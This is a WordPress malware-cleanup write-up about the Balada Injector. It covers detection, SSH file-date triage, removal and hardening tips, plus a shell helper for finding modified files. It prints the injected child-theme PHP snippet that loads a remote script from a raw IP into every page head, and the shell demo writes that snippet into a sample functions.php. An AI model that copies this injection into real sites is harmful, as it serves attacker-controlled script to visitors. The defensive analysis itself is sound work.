Beginning
Status:
- The website's pre-configured maintenance report, which runs daily scans for security vulnerabilities and overall site security status, detected malware.
- An additional external JS resource, “https://147.45.47.87/scripts/theme.js”, is being loaded on the front end, and it in turn connects to StickyADS.tv Ad (ads.stickyadstv.com).
Initiating investigation
- Malware Details: VirusTotal – URL
- Related Security Information: WATCH OUT! 1 Million+ WordPress Sites Infected with Balada Injector Malware | LinkedIn
- What’s Balada malware?
Balada Injector malware is a severe threat to WordPress site owners worldwide. It exploits themes and plugin vulnerabilities to breach site security, steal data, create fake admin accounts and maintain persistent access. WordPress sites with outdated plugins, nulled themes and plugins, and weak login credentials are most vulnerable to Balada Injector malware. via WATCH OUT! 1 Million+ WordPress Sites Infected with Balada Injector Malware | LinkedIn
- After clarifying the issue, proceed with the following steps:
- Full backup first for sure.
- Use the SSH command line to list files modified within one day before and after the date shown in the maintenance report.
- Among those, identify the files with a modification date of April 3rd that remained unchanged even after the site-wide update.
- Determine that within the child theme, which is typically not overwritten during updates, the function.php file contains an additional code snippet that calls the external JS:
/* Theme statistics function */
/* Injected snippet found in the child theme: it hooks wp_head so the remote script is printed into every page's <head>. */
function wptheme_stat() {
?>
<script async src="https://147.45.47.87/scripts/theme.js"></script>
<?php }
add_action("wp_head", "wptheme_stat");
- Clean all caches and scan again until it appears as “Verified Clean” from every vendor.
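The file-listing and search steps above, as an added shell example that is not part of the original write-up. It assumes GNU find and date (a Linux host); the site tree, the year and the file contents are constructed for demonstration.

```shell
#!/bin/sh
# Added example (not from the original write-up): list files modified within one
# day either side of the date from the maintenance report, then search those
# directories for the injected <script> tag. Assumes GNU find/date.

# list_recent_files DIR DATE -> files with mtime in [DATE-1day, DATE+1day]
list_recent_files() {
    dir="$1"; day="$2"
    start=$(date -d "$day -1 day" +%Y-%m-%d)
    end=$(date -d "$day +1 day" +%Y-%m-%d)
    find "$dir" -type f -newermt "$start" ! -newermt "$end" | sort
}

# grep_for_marker DIR MARKER -> files under DIR containing the literal MARKER
grep_for_marker() {
    grep -rlF -- "$2" "$1" | sort
}

# Constructed sample site tree for demonstration; paths, year and content are made up,
# only the injected snippet mirrors what the write-up found.
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-content/themes/child-theme" "$site/wp-content/plugins/foo"
    cat > "$site/wp-content/themes/child-theme/functions.php" <<'EOF'
<?php
/* Theme statistics function */
function wptheme_stat() {
?>
<script async src="https://147.45.47.87/scripts/theme.js"></script>
<?php }
add_action("wp_head", "wptheme_stat");
EOF
    echo '<?php // untouched plugin file' > "$site/wp-content/plugins/foo/foo.php"
    # Injected file dated the day the report flagged it; the plugin file is much older.
    touch -d "2024-04-03 10:15" "$site/wp-content/themes/child-theme/functions.php"
    touch -d "2024-01-10 08:00" "$site/wp-content/plugins/foo/foo.php"
    echo "$site"
}
```

Run list_recent_files against the WordPress root with the report date, then grep_for_marker with the flagged URL to confirm which of the recent files actually carry the injection.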
Suggestions & Improvements
- Backup your site regularly
- Keep themes and plugins updated
- Use trusted WordPress themes and plugins
- Use strong login passwords
- Enable 2FA for all users
- Implement a reliable malware scanner
Reminders
In this case, I tried using several security plugins, including Wordfence, but none of them could identify the problem, let alone the affected files.
Sucuri is the only service provider that detected the issue, either through their online service or plugin. The results indicate that the Balada injector malware is not easy to detect and check. Well done, Sucuri!